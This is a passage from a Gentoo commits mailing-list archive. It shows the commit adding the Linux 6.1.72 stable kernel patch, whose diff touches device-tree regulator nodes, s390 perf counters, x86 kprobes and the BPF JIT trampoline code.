+ 	val = atomic_read(&net->ipv6.ip6_rt_gc_expire);
+ 	atomic_set(&net->ipv6.ip6_rt_gc_expire, val - (val >> rt_elasticity));
+-	return entries > rt_max_size;
+ }
+ 
+ static int ip6_nh_lookup_table(struct net *net, struct fib6_config *cfg,
+@@ -6517,7 +6514,7 @@ static int __net_init ip6_route_net_init(struct net *net)
+ #endif
+ 
+ 	net->ipv6.sysctl.flush_delay = 0;
+-	net->ipv6.sysctl.ip6_rt_max_size = 4096;
++	net->ipv6.sysctl.ip6_rt_max_size = INT_MAX;
+ 	net->ipv6.sysctl.ip6_rt_gc_min_interval = HZ / 2;
+ 	net->ipv6.sysctl.ip6_rt_gc_timeout = 60*HZ;
+ 	net->ipv6.sysctl.ip6_rt_gc_interval = 30*HZ;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-10 17:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-10 17:16 UTC (permalink / raw
  To: gentoo-commits

commit:     196a597abd58ced0797e50134ddbe5f75714edec
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jan 10 17:16:49 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jan 10 17:16:49 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=196a597a

Linux patch 6.1.72

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1071_linux-6.1.72.patch | 9332 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9336 insertions(+)

diff --git a/0000_README b/0000_README
index 248cb097..fd657319 100644
--- a/0000_README
+++ b/0000_README
@@ -327,6 +327,10 @@ Patch:  1070_linux-6.1.71.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.71
 
+Patch:  1071_linux-6.1.72.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.72
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1071_linux-6.1.72.patch b/1071_linux-6.1.72.patch
new file mode 100644
index 00000000..2496793b
--- /dev/null
+++ b/1071_linux-6.1.72.patch
@@ -0,0 +1,9332 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 07a9c274c0e29..13d1078808bb5 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -10803,6 +10803,8 @@ L:	linux-kernel@vger.kernel.org
+ S:	Maintained
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git irq/core
+ F:	kernel/irq/
++F:	include/linux/group_cpus.h
++F:	lib/group_cpus.c
+ 
+ IRQCHIP DRIVERS
+ M:	Thomas Gleixner <tglx@linutronix.de>
+diff --git a/Makefile b/Makefile
+index 2840e36fd5596..bad3387b3251c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 71
++SUBLEVEL = 72
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index b60d271bf76a9..14273a6203dfc 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -34,6 +34,9 @@ config ARCH_HAS_SUBPAGE_FAULTS
+ config HOTPLUG_SMT
+ 	bool
+ 
++config SMT_NUM_THREADS_DYNAMIC
++	bool
++
+ config GENERIC_ENTRY
+        bool
+ 
+diff --git a/arch/arm/mach-sunxi/mc_smp.c b/arch/arm/mach-sunxi/mc_smp.c
+index 26cbce1353387..b2f5f4f28705f 100644
+--- a/arch/arm/mach-sunxi/mc_smp.c
++++ b/arch/arm/mach-sunxi/mc_smp.c
+@@ -808,12 +808,12 @@ static int __init sunxi_mc_smp_init(void)
+ 			break;
+ 	}
+ 
+-	is_a83t = sunxi_mc_smp_data[i].is_a83t;
+-
+ 	of_node_put(node);
+ 	if (ret)
+ 		return -ENODEV;
+ 
++	is_a83t = sunxi_mc_smp_data[i].is_a83t;
++
+ 	if (!sunxi_mc_smp_cpu_table_init())
+ 		return -EINVAL;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+index a5c0c788969fb..43ee28db61aa8 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+@@ -150,15 +150,15 @@
+ };
+ 
+ &psci {
+-	/delete-node/ cpu0;
+-	/delete-node/ cpu1;
+-	/delete-node/ cpu2;
+-	/delete-node/ cpu3;
+-	/delete-node/ cpu4;
+-	/delete-node/ cpu5;
+-	/delete-node/ cpu6;
+-	/delete-node/ cpu7;
+-	/delete-node/ cpu-cluster0;
++	/delete-node/ power-domain-cpu0;
++	/delete-node/ power-domain-cpu1;
++	/delete-node/ power-domain-cpu2;
++	/delete-node/ power-domain-cpu3;
++	/delete-node/ power-domain-cpu4;
++	/delete-node/ power-domain-cpu5;
++	/delete-node/ power-domain-cpu6;
++	/delete-node/ power-domain-cpu7;
++	/delete-node/ power-domain-cluster;
+ };
+ 
+ &cpus {
+@@ -351,7 +351,9 @@
+ 
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	/delete-property/ power-domains;
++
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -633,7 +635,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index c9efcb894a52f..8c9ccf5b4ea41 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -271,7 +271,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 		vdd-s1-supply = <&vph_pwr>;
+@@ -396,7 +396,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+index 20f275f8694dc..e2921640880a1 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+@@ -166,7 +166,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -419,7 +419,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -433,7 +433,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+index 64958dee17d8b..b47e333aa3510 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+@@ -117,7 +117,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -382,7 +382,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -396,7 +396,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi
+index 392461c29e76e..0713b774a97be 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi
+@@ -144,7 +144,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -280,7 +280,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -294,7 +294,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+index 83261c9bb4f23..b65c35865dab9 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+@@ -110,7 +110,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -375,7 +375,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -389,7 +389,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+index d6918e6d19799..249a715d5aae1 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+@@ -78,7 +78,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -308,7 +308,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -319,7 +319,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts
+index 0f470cf1ed1c1..6d6b3dd699475 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts
+@@ -125,7 +125,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index 093b04359ec39..ffbe45a99b74a 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -143,7 +143,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -343,7 +343,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -355,7 +355,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+index 74f43da51fa50..48a41ace8fc58 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+@@ -99,7 +99,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+index d028a7eb364a6..c169d2870bdf4 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+@@ -129,7 +129,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+diff --git a/arch/s390/kernel/perf_cpum_cf.c b/arch/s390/kernel/perf_cpum_cf.c
+index f043a7ff220b7..28fa80fd69fa0 100644
+--- a/arch/s390/kernel/perf_cpum_cf.c
++++ b/arch/s390/kernel/perf_cpum_cf.c
+@@ -2,7 +2,7 @@
+ /*
+  * Performance event support for s390x - CPU-measurement Counter Facility
+  *
+- *  Copyright IBM Corp. 2012, 2021
++ *  Copyright IBM Corp. 2012, 2022
+  *  Author(s): Hendrik Brueckner <brueckner@linux.ibm.com>
+  *	       Thomas Richter <tmricht@linux.ibm.com>
+  */
+@@ -434,6 +434,12 @@ static void cpumf_hw_inuse(void)
+ 	mutex_unlock(&pmc_reserve_mutex);
+ }
+ 
++static int is_userspace_event(u64 ev)
++{
++	return cpumf_generic_events_user[PERF_COUNT_HW_CPU_CYCLES] == ev ||
++	       cpumf_generic_events_user[PERF_COUNT_HW_INSTRUCTIONS] == ev;
++}
++
+ static int __hw_perf_event_init(struct perf_event *event, unsigned int type)
+ {
+ 	struct perf_event_attr *attr = &event->attr;
+@@ -456,19 +462,26 @@ static int __hw_perf_event_init(struct perf_event *event, unsigned int type)
+ 		if (is_sampling_event(event))	/* No sampling support */
+ 			return -ENOENT;
+ 		ev = attr->config;
+-		/* Count user space (problem-state) only */
+ 		if (!attr->exclude_user && attr->exclude_kernel) {
+-			if (ev >= ARRAY_SIZE(cpumf_generic_events_user))
+-				return -EOPNOTSUPP;
+-			ev = cpumf_generic_events_user[ev];
+-
+-		/* No support for kernel space counters only */
++			/*
++			 * Count user space (problem-state) only
++			 * Handle events 32 and 33 as 0:u and 1:u
++			 */
++			if (!is_userspace_event(ev)) {
++				if (ev >= ARRAY_SIZE(cpumf_generic_events_user))
++					return -EOPNOTSUPP;
++				ev = cpumf_generic_events_user[ev];
++			}
+ 		} else if (!attr->exclude_kernel && attr->exclude_user) {
++			/* No support for kernel space counters only */
+ 			return -EOPNOTSUPP;
+-		} else {	/* Count user and kernel space */
+-			if (ev >= ARRAY_SIZE(cpumf_generic_events_basic))
+-				return -EOPNOTSUPP;
+-			ev = cpumf_generic_events_basic[ev];
++		} else {
++			/* Count user and kernel space, incl. events 32 + 33 */
++			if (!is_userspace_event(ev)) {
++				if (ev >= ARRAY_SIZE(cpumf_generic_events_basic))
++					return -EOPNOTSUPP;
++				ev = cpumf_generic_events_basic[ev];
++			}
+ 		}
+ 		break;
+ 
+diff --git a/arch/s390/mm/vmem.c b/arch/s390/mm/vmem.c
+index 9a0ce5315f36d..3cbb461820666 100644
+--- a/arch/s390/mm/vmem.c
++++ b/arch/s390/mm/vmem.c
+@@ -11,6 +11,7 @@
+ #include <linux/list.h>
+ #include <linux/hugetlb.h>
+ #include <linux/slab.h>
++#include <asm/page-states.h>
+ #include <asm/cacheflush.h>
+ #include <asm/nospec-branch.h>
+ #include <asm/pgalloc.h>
+@@ -44,8 +45,11 @@ void *vmem_crst_alloc(unsigned long val)
+ 	unsigned long *table;
+ 
+ 	table = vmem_alloc_pages(CRST_ALLOC_ORDER);
+-	if (table)
+-		crst_table_init(table, val);
++	if (!table)
++		return NULL;
++	crst_table_init(table, val);
++	if (slab_is_available())
++		arch_set_page_dat(virt_to_page(table), CRST_ALLOC_ORDER);
+ 	return table;
+ }
+ 
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 2fb5e1541efc1..949129443b1c0 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -4033,12 +4033,17 @@ static struct perf_guest_switch_msr *intel_guest_get_msrs(int *nr, void *data)
+ 	u64 pebs_mask = cpuc->pebs_enabled & x86_pmu.pebs_capable;
+ 	int global_ctrl, pebs_enable;
+ 
++	/*
++	 * In addition to obeying exclude_guest/exclude_host, remove bits being
++	 * used for PEBS when running a guest, because PEBS writes to virtual
++	 * addresses (not physical addresses).
++	 */
+ 	*nr = 0;
+ 	global_ctrl = (*nr)++;
+ 	arr[global_ctrl] = (struct perf_guest_switch_msr){
+ 		.msr = MSR_CORE_PERF_GLOBAL_CTRL,
+ 		.host = intel_ctrl & ~cpuc->intel_ctrl_guest_mask,
+-		.guest = intel_ctrl & (~cpuc->intel_ctrl_host_mask | ~pebs_mask),
++		.guest = intel_ctrl & ~cpuc->intel_ctrl_host_mask & ~pebs_mask,
+ 	};
+ 
+ 	if (!x86_pmu.pebs)
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index ea155f0cf545c..6120f25b0d5cc 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -549,7 +549,8 @@ static void kprobe_emulate_call_indirect(struct kprobe *p, struct pt_regs *regs)
+ {
+ 	unsigned long offs = addrmode_regoffs[p->ainsn.indirect.reg];
+ 
+-	int3_emulate_call(regs, regs_get_register(regs, offs));
++	int3_emulate_push(regs, regs->ip - INT3_INSN_SIZE + p->ainsn.size);
++	int3_emulate_jmp(regs, regs_get_register(regs, offs));
+ }
+ NOKPROBE_SYMBOL(kprobe_emulate_call_indirect);
+ 
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index 4686c1d9d0cfd..b69aee6245e4a 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -893,6 +893,10 @@ static void emit_nops(u8 **pprog, int len)
+ 
+ #define INSN_SZ_DIFF (((addrs[i] - addrs[i - 1]) - (prog - temp)))
+ 
++/* mov rax, qword ptr [rbp - rounded_stack_depth - 8] */
++#define RESTORE_TAIL_CALL_CNT(stack)				\
++	EMIT3_off32(0x48, 0x8B, 0x85, -round_up(stack, 8) - 8)
++
+ static int do_jit(struct bpf_prog *bpf_prog, int *addrs, u8 *image, u8 *rw_image,
+ 		  int oldproglen, struct jit_context *ctx, bool jmp_padding)
+ {
+@@ -1436,9 +1440,7 @@ st:			if (is_imm8(insn->off))
+ 		case BPF_JMP | BPF_CALL:
+ 			func = (u8 *) __bpf_call_base + imm32;
+ 			if (tail_call_reachable) {
+-				/* mov rax, qword ptr [rbp - rounded_stack_depth - 8] */
+-				EMIT3_off32(0x48, 0x8B, 0x85,
+-					    -round_up(bpf_prog->aux->stack_depth, 8) - 8);
++				RESTORE_TAIL_CALL_CNT(bpf_prog->aux->stack_depth);
+ 				if (!imm32 || emit_call(&prog, func, image + addrs[i - 1] + 7))
+ 					return -EINVAL;
+ 			} else {
+@@ -1623,16 +1625,24 @@ emit_cond_jmp:		/* Convert BPF opcode to x86 */
+ 			break;
+ 
+ 		case BPF_JMP | BPF_JA:
+-			if (insn->off == -1)
+-				/* -1 jmp instructions will always jump
+-				 * backwards two bytes. Explicitly handling
+-				 * this case avoids wasting too many passes
+-				 * when there are long sequences of replaced
+-				 * dead code.
+-				 */
+-				jmp_offset = -2;
+-			else
+-				jmp_offset = addrs[i + insn->off] - addrs[i];
++		case BPF_JMP32 | BPF_JA:
++			if (BPF_CLASS(insn->code) == BPF_JMP) {
++				if (insn->off == -1)
++					/* -1 jmp instructions will always jump
++					 * backwards two bytes. Explicitly handling
++					 * this case avoids wasting too many passes
++					 * when there are long sequences of replaced
++					 * dead code.
++					 */
++					jmp_offset = -2;
++				else
++					jmp_offset = addrs[i + insn->off] - addrs[i];
++			} else {
++				if (insn->imm == -1)
++					jmp_offset = -2;
++				else
++					jmp_offset = addrs[i + insn->imm] - addrs[i];
++			}
+ 
+ 			if (!jmp_offset) {
+ 				/*
+@@ -1750,63 +1760,37 @@ emit_jmp:
+ 	return proglen;
+ }
+ 
+-static void save_regs(const struct btf_func_model *m, u8 **prog, int nr_args,
++static void save_regs(const struct btf_func_model *m, u8 **prog, int nr_regs,
+ 		      int stack_size)
+ {
+-	int i, j, arg_size, nr_regs;
++	int i;
++
+ 	/* Store function arguments to stack.
+ 	 * For a function that accepts two pointers the sequence will be:
+ 	 * mov QWORD PTR [rbp-0x10],rdi
+ 	 * mov QWORD PTR [rbp-0x8],rsi
+ 	 */
+-	for (i = 0, j = 0; i < min(nr_args, 6); i++) {
+-		if (m->arg_flags[i] & BTF_FMODEL_STRUCT_ARG) {
+-			nr_regs = (m->arg_size[i] + 7) / 8;
+-			arg_size = 8;
+-		} else {
+-			nr_regs = 1;
+-			arg_size = m->arg_size[i];
+-		}
+-
+-		while (nr_regs) {
+-			emit_stx(prog, bytes_to_bpf_size(arg_size),
+-				 BPF_REG_FP,
+-				 j == 5 ? X86_REG_R9 : BPF_REG_1 + j,
+-				 -(stack_size - j * 8));
+-			nr_regs--;
+-			j++;
+-		}
+-	}
++	for (i = 0; i < min(nr_regs, 6); i++)
++		emit_stx(prog, BPF_DW, BPF_REG_FP,
++			 i == 5 ? X86_REG_R9 : BPF_REG_1 + i,
++			 -(stack_size - i * 8));
+ }
+ 
+-static void restore_regs(const struct btf_func_model *m, u8 **prog, int nr_args,
++static void restore_regs(const struct btf_func_model *m, u8 **prog, int nr_regs,
+ 			 int stack_size)
+ {
+-	int i, j, arg_size, nr_regs;
++	int i;
+ 
+ 	/* Restore function arguments from stack.
+ 	 * For a function that accepts two pointers the sequence will be:
+ 	 * EMIT4(0x48, 0x8B, 0x7D, 0xF0); mov rdi,QWORD PTR [rbp-0x10]
+ 	 * EMIT4(0x48, 0x8B, 0x75, 0xF8); mov rsi,QWORD PTR [rbp-0x8]
+ 	 */
+-	for (i = 0, j = 0; i < min(nr_args, 6); i++) {
+-		if (m->arg_flags[i] & BTF_FMODEL_STRUCT_ARG) {
+-			nr_regs = (m->arg_size[i] + 7) / 8;
+-			arg_size = 8;
+-		} else {
+-			nr_regs = 1;
+-			arg_size = m->arg_size[i];
+-		}
+-
+-		while (nr_regs) {
+-			emit_ldx(prog, bytes_to_bpf_size(arg_size),
+-				 j == 5 ? X86_REG_R9 : BPF_REG_1 + j,
+-				 BPF_REG_FP,
+-				 -(stack_size - j * 8));
+-			nr_regs--;
+-			j++;
+-		}
+-	}
++	for (i = 0; i < min(nr_regs, 6); i++)
++		emit_ldx(prog, BPF_DW,
++			 i == 5 ? X86_REG_R9 : BPF_REG_1 + i,
++			 BPF_REG_FP,
++			 -(stack_size - i * 8));
+ }
+ 
+ static int invoke_bpf_prog(const struct btf_func_model *m, u8 **pprog,
+@@ -2031,8 +2015,8 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 				struct bpf_tramp_links *tlinks,
+ 				void *func_addr)
+ {
+-	int ret, i, nr_args = m->nr_args, extra_nregs = 0;
+-	int regs_off, ip_off, args_off, stack_size = nr_args * 8, run_ctx_off;
++	int i, ret, nr_regs = m->nr_args, stack_size = 0;
++	int regs_off, nregs_off, ip_off, run_ctx_off;
+ 	struct bpf_tramp_links *fentry = &tlinks[BPF_TRAMP_FENTRY];
+ 	struct bpf_tramp_links *fexit = &tlinks[BPF_TRAMP_FEXIT];
+ 	struct bpf_tramp_links *fmod_ret = &tlinks[BPF_TRAMP_MODIFY_RETURN];
+@@ -2041,17 +2025,14 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	u8 *prog;
+ 	bool save_ret;
+ 
+-	/* x86-64 supports up to 6 arguments. 7+ can be added in the future */
+-	if (nr_args > 6)
+-		return -ENOTSUPP;
+-
+-	for (i = 0; i < MAX_BPF_FUNC_ARGS; i++) {
++	/* extra registers for struct arguments */
++	for (i = 0; i < m->nr_args; i++)
+ 		if (m->arg_flags[i] & BTF_FMODEL_STRUCT_ARG)
+-			extra_nregs += (m->arg_size[i] + 7) / 8 - 1;
+-	}
+-	if (nr_args + extra_nregs > 6)
++			nr_regs += (m->arg_size[i] + 7) / 8 - 1;
++
++	/* x86-64 supports up to 6 arguments. 7+ can be added in the future */
++	if (nr_regs > 6)
+ 		return -ENOTSUPP;
+-	stack_size += extra_nregs * 8;
+ 
+ 	/* Generated trampoline stack layout:
+ 	 *
+@@ -2065,11 +2046,12 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	 *                 [ ...             ]
+ 	 * RBP - regs_off  [ reg_arg1        ]  program's ctx pointer
+ 	 *
+-	 * RBP - args_off  [ arg regs count  ]  always
++	 * RBP - nregs_off [ regs count	     ]  always
+ 	 *
+ 	 * RBP - ip_off    [ traced function ]  BPF_TRAMP_F_IP_ARG flag
+ 	 *
+ 	 * RBP - run_ctx_off [ bpf_tramp_run_ctx ]
++	 * RSP                 [ tail_call_cnt ] BPF_TRAMP_F_TAIL_CALL_CTX
+ 	 */
+ 
+ 	/* room for return value of orig_call or fentry prog */
+@@ -2077,11 +2059,12 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	if (save_ret)
+ 		stack_size += 8;
+ 
++	stack_size += nr_regs * 8;
+ 	regs_off = stack_size;
+ 
+-	/* args count  */
++	/* regs count  */
+ 	stack_size += 8;
+-	args_off = stack_size;
++	nregs_off = stack_size;
+ 
+ 	if (flags & BPF_TRAMP_F_IP_ARG)
+ 		stack_size += 8; /* room for IP address argument */
+@@ -2106,14 +2089,16 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	EMIT1(0x55);		 /* push rbp */
+ 	EMIT3(0x48, 0x89, 0xE5); /* mov rbp, rsp */
+ 	EMIT4(0x48, 0x83, 0xEC, stack_size); /* sub rsp, stack_size */
++	if (flags & BPF_TRAMP_F_TAIL_CALL_CTX)
++		EMIT1(0x50);		/* push rax */
+ 	EMIT1(0x53);		 /* push rbx */
+ 
+ 	/* Store number of argument registers of the traced function:
+-	 *   mov rax, nr_args + extra_nregs
+-	 *   mov QWORD PTR [rbp - args_off], rax
++	 *   mov rax, nr_regs
++	 *   mov QWORD PTR [rbp - nregs_off], rax
+ 	 */
+-	emit_mov_imm64(&prog, BPF_REG_0, 0, (u32) nr_args + extra_nregs);
+-	emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_0, -args_off);
++	emit_mov_imm64(&prog, BPF_REG_0, 0, (u32) nr_regs);
++	emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_0, -nregs_off);
+ 
+ 	if (flags & BPF_TRAMP_F_IP_ARG) {
+ 		/* Store IP address of the traced function:
+@@ -2124,7 +2109,7 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 		emit_stx(&prog, BPF_DW, BPF_REG_FP, BPF_REG_0, -ip_off);
+ 	}
+ 
+-	save_regs(m, &prog, nr_args, regs_off);
++	save_regs(m, &prog, nr_regs, regs_off);
+ 
+ 	if (flags & BPF_TRAMP_F_CALL_ORIG) {
+ 		/* arg1: mov rdi, im */
+@@ -2154,11 +2139,17 @@ int arch_prepare_bpf_trampoline(struct bpf_tramp_image *im, void *image, void *i
+ 	}
+ 
+ 	if (flags & BPF_TRAMP_F_CALL_ORIG) {
+-		restore_regs(m, &prog, nr_args, regs_off);
++		restore_regs(m, &prog, nr_regs, regs_off);
++
++		if (flags & BPF_TRAMP_F_TAIL_CALL_CTX)
++			/* Before calling the original function, restore the
++			 * tail_call_cnt from stack to rax.
